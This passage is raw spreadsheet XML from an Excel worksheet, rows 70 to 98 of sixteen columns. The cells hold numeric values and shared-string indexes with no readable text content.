      </c>
      <c r="E70" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F70" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G70" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H70" s="6">
        <v>2.6</v>
      </c>
      <c r="I70" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J70" s="6" t="s">
        <v>7694</v>
      </c>
      <c r="K70" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L70" s="6" t="s">
        <v>3190</v>
      </c>
      <c r="M70" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="N70" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O70" s="6">
        <v>4</v>
      </c>
      <c r="P70" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="71" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A71" s="6">
        <v>5389</v>
      </c>
      <c r="B71" s="6" t="s">
        <v>7695</v>
      </c>
      <c r="C71" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D71" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E71" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F71" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G71" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H71" s="6">
        <v>2.6</v>
      </c>
      <c r="I71" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J71" s="6" t="s">
        <v>7696</v>
      </c>
      <c r="K71" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L71" s="6" t="s">
        <v>7697</v>
      </c>
      <c r="M71" s="6" t="s">
        <v>7614</v>
      </c>
      <c r="N71" s="6">
        <v>5390</v>
      </c>
      <c r="O71" s="6">
        <v>5</v>
      </c>
      <c r="P71" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="72" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A72" s="6">
        <v>5391</v>
      </c>
      <c r="B72" s="6" t="s">
        <v>7698</v>
      </c>
      <c r="C72" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D72" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E72" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F72" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G72" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H72" s="6">
        <v>2.6</v>
      </c>
      <c r="I72" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J72" s="6" t="s">
        <v>7699</v>
      </c>
      <c r="K72" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L72" s="6" t="s">
        <v>7700</v>
      </c>
      <c r="M72" s="6" t="s">
        <v>7614</v>
      </c>
      <c r="N72" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O72" s="6">
        <v>3</v>
      </c>
      <c r="P72" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="73" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A73" s="6">
        <v>5392</v>
      </c>
      <c r="B73" s="6" t="s">
        <v>7701</v>
      </c>
      <c r="C73" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D73" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E73" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F73" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G73" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H73" s="6">
        <v>2.6</v>
      </c>
      <c r="I73" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J73" s="6" t="s">
        <v>7702</v>
      </c>
      <c r="K73" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L73" s="6" t="s">
        <v>3269</v>
      </c>
      <c r="M73" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="N73" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O73" s="6">
        <v>4</v>
      </c>
      <c r="P73" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="74" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A74" s="6">
        <v>5403</v>
      </c>
      <c r="B74" s="6" t="s">
        <v>7703</v>
      </c>
      <c r="C74" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D74" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E74" s="6" t="s">
        <v>162</v>
      </c>
      <c r="F74" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G74" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H74" s="6" t="s">
        <v>7654</v>
      </c>
      <c r="I74" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J74" s="6" t="s">
        <v>7704</v>
      </c>
      <c r="K74" s="6" t="s">
        <v>4675</v>
      </c>
      <c r="L74" s="6" t="s">
        <v>7705</v>
      </c>
      <c r="M74" s="6" t="s">
        <v>3737</v>
      </c>
      <c r="N74" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O74" s="6">
        <v>9</v>
      </c>
      <c r="P74" s="6" t="s">
        <v>7706</v>
      </c>
    </row>
    <row r="75" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A75" s="6">
        <v>5480</v>
      </c>
      <c r="B75" s="6" t="s">
        <v>7773</v>
      </c>
      <c r="C75" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D75" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E75" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F75" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G75" s="6" t="s">
        <v>33</v>
      </c>
      <c r="H75" s="6">
        <v>2.6</v>
      </c>
      <c r="I75" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J75" s="6" t="s">
        <v>7774</v>
      </c>
      <c r="K75" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L75" s="6" t="s">
        <v>7212</v>
      </c>
      <c r="M75" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="N75" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O75" s="6">
        <v>4</v>
      </c>
      <c r="P75" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="76" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A76" s="6">
        <v>5634</v>
      </c>
      <c r="B76" s="6" t="s">
        <v>7953</v>
      </c>
      <c r="C76" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D76" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E76" s="6" t="s">
        <v>422</v>
      </c>
      <c r="F76" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G76" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H76" s="6" t="s">
        <v>7954</v>
      </c>
      <c r="I76" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J76" s="6" t="s">
        <v>7955</v>
      </c>
      <c r="K76" s="6" t="s">
        <v>7956</v>
      </c>
      <c r="L76" s="6" t="s">
        <v>7957</v>
      </c>
      <c r="M76" s="6" t="s">
        <v>4769</v>
      </c>
      <c r="N76" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O76" s="6">
        <v>3</v>
      </c>
      <c r="P76" s="6" t="s">
        <v>7958</v>
      </c>
    </row>
    <row r="77" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A77" s="6">
        <v>5829</v>
      </c>
      <c r="B77" s="6" t="s">
        <v>8130</v>
      </c>
      <c r="C77" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D77" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E77" s="6" t="s">
        <v>356</v>
      </c>
      <c r="F77" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G77" s="6" t="s">
        <v>66</v>
      </c>
      <c r="H77" s="6" t="s">
        <v>3788</v>
      </c>
      <c r="I77" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J77" s="6" t="s">
        <v>8131</v>
      </c>
      <c r="K77" s="6" t="s">
        <v>93</v>
      </c>
      <c r="L77" s="6" t="s">
        <v>8132</v>
      </c>
      <c r="M77" s="6" t="s">
        <v>8133</v>
      </c>
      <c r="N77" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O77" s="6">
        <v>4</v>
      </c>
      <c r="P77" s="6" t="s">
        <v>8134</v>
      </c>
    </row>
    <row r="78" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A78" s="6">
        <v>5841</v>
      </c>
      <c r="B78" s="6" t="s">
        <v>8157</v>
      </c>
      <c r="C78" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D78" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E78" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F78" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G78" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H78" s="6" t="s">
        <v>8158</v>
      </c>
      <c r="I78" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J78" s="6" t="s">
        <v>8159</v>
      </c>
      <c r="K78" s="6" t="s">
        <v>57</v>
      </c>
      <c r="L78" s="6" t="s">
        <v>3597</v>
      </c>
      <c r="M78" s="6" t="s">
        <v>2864</v>
      </c>
      <c r="N78" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O78" s="6">
        <v>4</v>
      </c>
      <c r="P78" s="6" t="s">
        <v>8160</v>
      </c>
    </row>
    <row r="79" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A79" s="6">
        <v>5849</v>
      </c>
      <c r="B79" s="6" t="s">
        <v>8181</v>
      </c>
      <c r="C79" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D79" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E79" s="6" t="s">
        <v>1203</v>
      </c>
      <c r="F79" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G79" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H79" s="6" t="s">
        <v>8182</v>
      </c>
      <c r="I79" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J79" s="6" t="s">
        <v>8183</v>
      </c>
      <c r="K79" s="6" t="s">
        <v>4822</v>
      </c>
      <c r="L79" s="6" t="s">
        <v>8184</v>
      </c>
      <c r="M79" s="6" t="s">
        <v>2391</v>
      </c>
      <c r="N79" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O79" s="6">
        <v>5</v>
      </c>
      <c r="P79" s="6" t="s">
        <v>8185</v>
      </c>
    </row>
    <row r="80" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A80" s="6">
        <v>5953</v>
      </c>
      <c r="B80" s="6" t="s">
        <v>8351</v>
      </c>
      <c r="C80" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D80" s="6" t="s">
        <v>525</v>
      </c>
      <c r="E80" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F80" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G80" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H80" s="6" t="s">
        <v>7329</v>
      </c>
      <c r="I80" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J80" s="6" t="s">
        <v>8352</v>
      </c>
      <c r="K80" s="6" t="s">
        <v>8353</v>
      </c>
      <c r="L80" s="6" t="s">
        <v>8354</v>
      </c>
      <c r="M80" s="6" t="s">
        <v>130</v>
      </c>
      <c r="N80" s="6">
        <v>5952</v>
      </c>
      <c r="O80" s="6">
        <v>10</v>
      </c>
      <c r="P80" s="6" t="s">
        <v>542</v>
      </c>
    </row>
    <row r="81" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A81" s="6">
        <v>6028</v>
      </c>
      <c r="B81" s="6" t="s">
        <v>8438</v>
      </c>
      <c r="C81" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D81" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E81" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F81" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G81" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H81" s="6">
        <v>2.6</v>
      </c>
      <c r="I81" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J81" s="6" t="s">
        <v>8439</v>
      </c>
      <c r="K81" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L81" s="6" t="s">
        <v>7212</v>
      </c>
      <c r="M81" s="6" t="s">
        <v>2864</v>
      </c>
      <c r="N81" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O81" s="6">
        <v>5</v>
      </c>
      <c r="P81" s="6" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="82" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A82" s="6">
        <v>6073</v>
      </c>
      <c r="B82" s="6" t="s">
        <v>8509</v>
      </c>
      <c r="C82" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D82" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E82" s="6" t="s">
        <v>356</v>
      </c>
      <c r="F82" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G82" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H82" s="6" t="s">
        <v>5947</v>
      </c>
      <c r="I82" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J82" s="6" t="s">
        <v>8510</v>
      </c>
      <c r="K82" s="6" t="s">
        <v>518</v>
      </c>
      <c r="L82" s="6" t="s">
        <v>8511</v>
      </c>
      <c r="M82" s="6" t="s">
        <v>93</v>
      </c>
      <c r="N82" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O82" s="6">
        <v>2</v>
      </c>
      <c r="P82" s="6" t="s">
        <v>8512</v>
      </c>
    </row>
    <row r="83" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A83" s="6">
        <v>6148</v>
      </c>
      <c r="B83" s="6" t="s">
        <v>8576</v>
      </c>
      <c r="C83" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D83" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E83" s="6" t="s">
        <v>124</v>
      </c>
      <c r="F83" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G83" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H83" s="6" t="s">
        <v>8577</v>
      </c>
      <c r="I83" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J83" s="6" t="s">
        <v>8578</v>
      </c>
      <c r="K83" s="6" t="s">
        <v>1881</v>
      </c>
      <c r="L83" s="6" t="s">
        <v>8579</v>
      </c>
      <c r="M83" s="6" t="s">
        <v>1653</v>
      </c>
      <c r="N83" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O83" s="6">
        <v>6</v>
      </c>
      <c r="P83" s="6" t="s">
        <v>8580</v>
      </c>
    </row>
    <row r="84" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A84" s="6">
        <v>6151</v>
      </c>
      <c r="B84" s="6" t="s">
        <v>8581</v>
      </c>
      <c r="C84" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D84" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E84" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F84" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G84" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H84" s="6">
        <v>2.6</v>
      </c>
      <c r="I84" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J84" s="6" t="s">
        <v>8582</v>
      </c>
      <c r="K84" s="6" t="s">
        <v>7609</v>
      </c>
      <c r="L84" s="6" t="s">
        <v>6114</v>
      </c>
      <c r="M84" s="6" t="s">
        <v>2864</v>
      </c>
      <c r="N84" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O84" s="6">
        <v>4</v>
      </c>
      <c r="P84" s="6" t="s">
        <v>8583</v>
      </c>
    </row>
    <row r="85" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A85" s="6">
        <v>6307</v>
      </c>
      <c r="B85" s="6" t="s">
        <v>8714</v>
      </c>
      <c r="C85" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D85" s="6" t="s">
        <v>152</v>
      </c>
      <c r="E85" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F85" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G85" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H85" s="6" t="s">
        <v>8670</v>
      </c>
      <c r="I85" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J85" s="6" t="s">
        <v>8715</v>
      </c>
      <c r="K85" s="6" t="s">
        <v>8716</v>
      </c>
      <c r="L85" s="6" t="s">
        <v>8717</v>
      </c>
      <c r="M85" s="6" t="s">
        <v>5069</v>
      </c>
      <c r="N85" s="6">
        <v>9511</v>
      </c>
      <c r="O85" s="6">
        <v>105</v>
      </c>
      <c r="P85" s="6" t="s">
        <v>8718</v>
      </c>
    </row>
    <row r="86" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A86" s="6">
        <v>6357</v>
      </c>
      <c r="B86" s="6" t="s">
        <v>8776</v>
      </c>
      <c r="C86" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D86" s="6" t="s">
        <v>525</v>
      </c>
      <c r="E86" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F86" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G86" s="6" t="s">
        <v>33</v>
      </c>
      <c r="H86" s="6" t="s">
        <v>8777</v>
      </c>
      <c r="I86" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J86" s="6" t="s">
        <v>8778</v>
      </c>
      <c r="K86" s="6" t="s">
        <v>8779</v>
      </c>
      <c r="L86" s="6" t="s">
        <v>8780</v>
      </c>
      <c r="M86" s="6" t="s">
        <v>8781</v>
      </c>
      <c r="N86" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O86" s="6">
        <v>9</v>
      </c>
      <c r="P86" s="6" t="s">
        <v>10215</v>
      </c>
    </row>
    <row r="87" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A87" s="6">
        <v>6371</v>
      </c>
      <c r="B87" s="6" t="s">
        <v>8795</v>
      </c>
      <c r="C87" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D87" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E87" s="6" t="s">
        <v>124</v>
      </c>
      <c r="F87" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G87" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H87" s="6" t="s">
        <v>8796</v>
      </c>
      <c r="I87" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J87" s="6" t="s">
        <v>8797</v>
      </c>
      <c r="K87" s="6" t="s">
        <v>8798</v>
      </c>
      <c r="L87" s="6" t="s">
        <v>8799</v>
      </c>
      <c r="M87" s="6" t="s">
        <v>1653</v>
      </c>
      <c r="N87" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O87" s="6">
        <v>1</v>
      </c>
      <c r="P87" s="6" t="s">
        <v>8800</v>
      </c>
    </row>
    <row r="88" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A88" s="6">
        <v>6394</v>
      </c>
      <c r="B88" s="6" t="s">
        <v>8832</v>
      </c>
      <c r="C88" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D88" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E88" s="6" t="s">
        <v>8833</v>
      </c>
      <c r="F88" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G88" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H88" s="6" t="s">
        <v>8834</v>
      </c>
    </row>
    <row r="89" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A89" s="6">
        <v>6610</v>
      </c>
      <c r="B89" s="6" t="s">
        <v>9058</v>
      </c>
      <c r="C89" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D89" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E89" s="6" t="s">
        <v>65</v>
      </c>
      <c r="F89" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G89" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H89" s="6" t="s">
        <v>8670</v>
      </c>
      <c r="I89" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J89" s="6" t="s">
        <v>9059</v>
      </c>
      <c r="K89" s="6" t="s">
        <v>5034</v>
      </c>
      <c r="L89" s="6" t="s">
        <v>9060</v>
      </c>
      <c r="M89" s="6" t="s">
        <v>70</v>
      </c>
      <c r="N89" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O89" s="6">
        <v>7</v>
      </c>
      <c r="P89" s="6" t="s">
        <v>11612</v>
      </c>
    </row>
    <row r="90" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A90" s="6">
        <v>6818</v>
      </c>
      <c r="B90" s="6" t="s">
        <v>9284</v>
      </c>
      <c r="C90" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D90" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E90" s="6" t="s">
        <v>744</v>
      </c>
      <c r="F90" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G90" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H90" s="6" t="s">
        <v>9069</v>
      </c>
      <c r="I90" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J90" s="6" t="s">
        <v>9285</v>
      </c>
      <c r="K90" s="6" t="s">
        <v>9286</v>
      </c>
      <c r="L90" s="6" t="s">
        <v>9287</v>
      </c>
      <c r="M90" s="6" t="s">
        <v>5175</v>
      </c>
      <c r="N90" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O90" s="6">
        <v>4</v>
      </c>
      <c r="P90" s="6" t="s">
        <v>9288</v>
      </c>
    </row>
    <row r="91" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A91" s="6">
        <v>7033</v>
      </c>
      <c r="B91" s="6" t="s">
        <v>9507</v>
      </c>
      <c r="C91" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D91" s="6" t="s">
        <v>525</v>
      </c>
      <c r="E91" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F91" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G91" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H91" s="6" t="s">
        <v>9111</v>
      </c>
      <c r="I91" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J91" s="6" t="s">
        <v>9508</v>
      </c>
      <c r="K91" s="6" t="s">
        <v>84</v>
      </c>
      <c r="L91" s="6" t="s">
        <v>9394</v>
      </c>
      <c r="P91" s="6" t="s">
        <v>1441</v>
      </c>
    </row>
    <row r="92" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A92" s="6">
        <v>7148</v>
      </c>
      <c r="B92" s="6" t="s">
        <v>9651</v>
      </c>
      <c r="C92" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D92" s="6" t="s">
        <v>152</v>
      </c>
      <c r="E92" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F92" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G92" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H92" s="6" t="s">
        <v>9652</v>
      </c>
      <c r="I92" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J92" s="6" t="s">
        <v>9653</v>
      </c>
      <c r="K92" s="6" t="s">
        <v>2942</v>
      </c>
      <c r="L92" s="6" t="s">
        <v>9654</v>
      </c>
      <c r="M92" s="6" t="s">
        <v>299</v>
      </c>
      <c r="N92" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O92" s="6">
        <v>6</v>
      </c>
      <c r="P92" s="6" t="s">
        <v>9655</v>
      </c>
    </row>
    <row r="93" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A93" s="6">
        <v>7182</v>
      </c>
      <c r="B93" s="6" t="s">
        <v>9687</v>
      </c>
      <c r="C93" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D93" s="6" t="s">
        <v>28</v>
      </c>
      <c r="E93" s="6" t="s">
        <v>251</v>
      </c>
      <c r="F93" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G93" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H93" s="6" t="s">
        <v>9171</v>
      </c>
      <c r="I93" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J93" s="6" t="s">
        <v>9688</v>
      </c>
      <c r="K93" s="6" t="s">
        <v>9689</v>
      </c>
      <c r="L93" s="6" t="s">
        <v>9690</v>
      </c>
      <c r="M93" s="6" t="s">
        <v>2666</v>
      </c>
      <c r="N93" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O93" s="6">
        <v>1</v>
      </c>
      <c r="P93" s="6" t="s">
        <v>9691</v>
      </c>
    </row>
    <row r="94" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A94" s="6">
        <v>7273</v>
      </c>
      <c r="B94" s="6" t="s">
        <v>9821</v>
      </c>
      <c r="C94" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D94" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E94" s="6" t="s">
        <v>1656</v>
      </c>
      <c r="F94" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G94" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H94" s="6" t="s">
        <v>9171</v>
      </c>
      <c r="I94" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J94" s="6" t="s">
        <v>9822</v>
      </c>
      <c r="K94" s="6" t="s">
        <v>9823</v>
      </c>
      <c r="L94" s="6" t="s">
        <v>9824</v>
      </c>
      <c r="M94" s="6" t="s">
        <v>3602</v>
      </c>
      <c r="N94" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O94" s="6">
        <v>13</v>
      </c>
      <c r="P94" s="6" t="s">
        <v>9825</v>
      </c>
    </row>
    <row r="95" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A95" s="6">
        <v>7354</v>
      </c>
      <c r="B95" s="6" t="s">
        <v>9885</v>
      </c>
      <c r="C95" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D95" s="6" t="s">
        <v>111</v>
      </c>
      <c r="E95" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F95" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G95" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H95" s="6" t="s">
        <v>9886</v>
      </c>
      <c r="I95" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J95" s="6" t="s">
        <v>9887</v>
      </c>
      <c r="K95" s="6" t="s">
        <v>9888</v>
      </c>
      <c r="L95" s="6" t="s">
        <v>9889</v>
      </c>
      <c r="M95" s="6" t="s">
        <v>9890</v>
      </c>
      <c r="N95" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O95" s="6">
        <v>6</v>
      </c>
      <c r="P95" s="6" t="s">
        <v>9891</v>
      </c>
    </row>
    <row r="96" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A96" s="6">
        <v>7472</v>
      </c>
      <c r="B96" s="6" t="s">
        <v>10032</v>
      </c>
      <c r="C96" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D96" s="6" t="s">
        <v>5208</v>
      </c>
      <c r="E96" s="6" t="s">
        <v>8334</v>
      </c>
      <c r="F96" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G96" s="6" t="s">
        <v>66</v>
      </c>
      <c r="H96" s="6" t="s">
        <v>10033</v>
      </c>
      <c r="I96" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J96" s="6" t="s">
        <v>10034</v>
      </c>
      <c r="K96" s="6" t="s">
        <v>4934</v>
      </c>
      <c r="L96" s="6" t="s">
        <v>10035</v>
      </c>
      <c r="M96" s="6" t="s">
        <v>117</v>
      </c>
      <c r="N96" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O96" s="6">
        <v>4</v>
      </c>
      <c r="P96" s="6" t="s">
        <v>10036</v>
      </c>
    </row>
    <row r="97" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A97" s="6">
        <v>7505</v>
      </c>
      <c r="B97" s="6" t="s">
        <v>10089</v>
      </c>
      <c r="C97" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D97" s="6" t="s">
        <v>22</v>
      </c>
      <c r="E97" s="6" t="s">
        <v>1724</v>
      </c>
      <c r="F97" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G97" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H97" s="6" t="s">
        <v>10090</v>
      </c>
      <c r="I97" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J97" s="6" t="s">
        <v>10091</v>
      </c>
      <c r="K97" s="6" t="s">
        <v>10092</v>
      </c>
      <c r="L97" s="6" t="s">
        <v>10093</v>
      </c>
      <c r="M97" s="6" t="s">
        <v>921</v>
      </c>
      <c r="N97" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O97" s="6">
        <v>72</v>
      </c>
      <c r="P97" s="6" t="s">
        <v>28245</v>
      </c>
    </row>
    <row r="98" spans="1:16" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A98" s="6">
        <v>7513</v>
      </c>
      <c r="B98" s="6" t="s">
        <v>10101</v>
      </c>
      <c r="C98" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D98" s="6" t="s">
        <v>43</v>
      </c>
      <c r="E98" s="6" t="s">
        <v>103</v>
      </c>
      <c r="F98" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G98" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H98" s="6" t="s">
        <v>10102</v>
      </c>
      <c r="I98" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J98" s="6" t="s">
        <v>10103</v>
      </c>
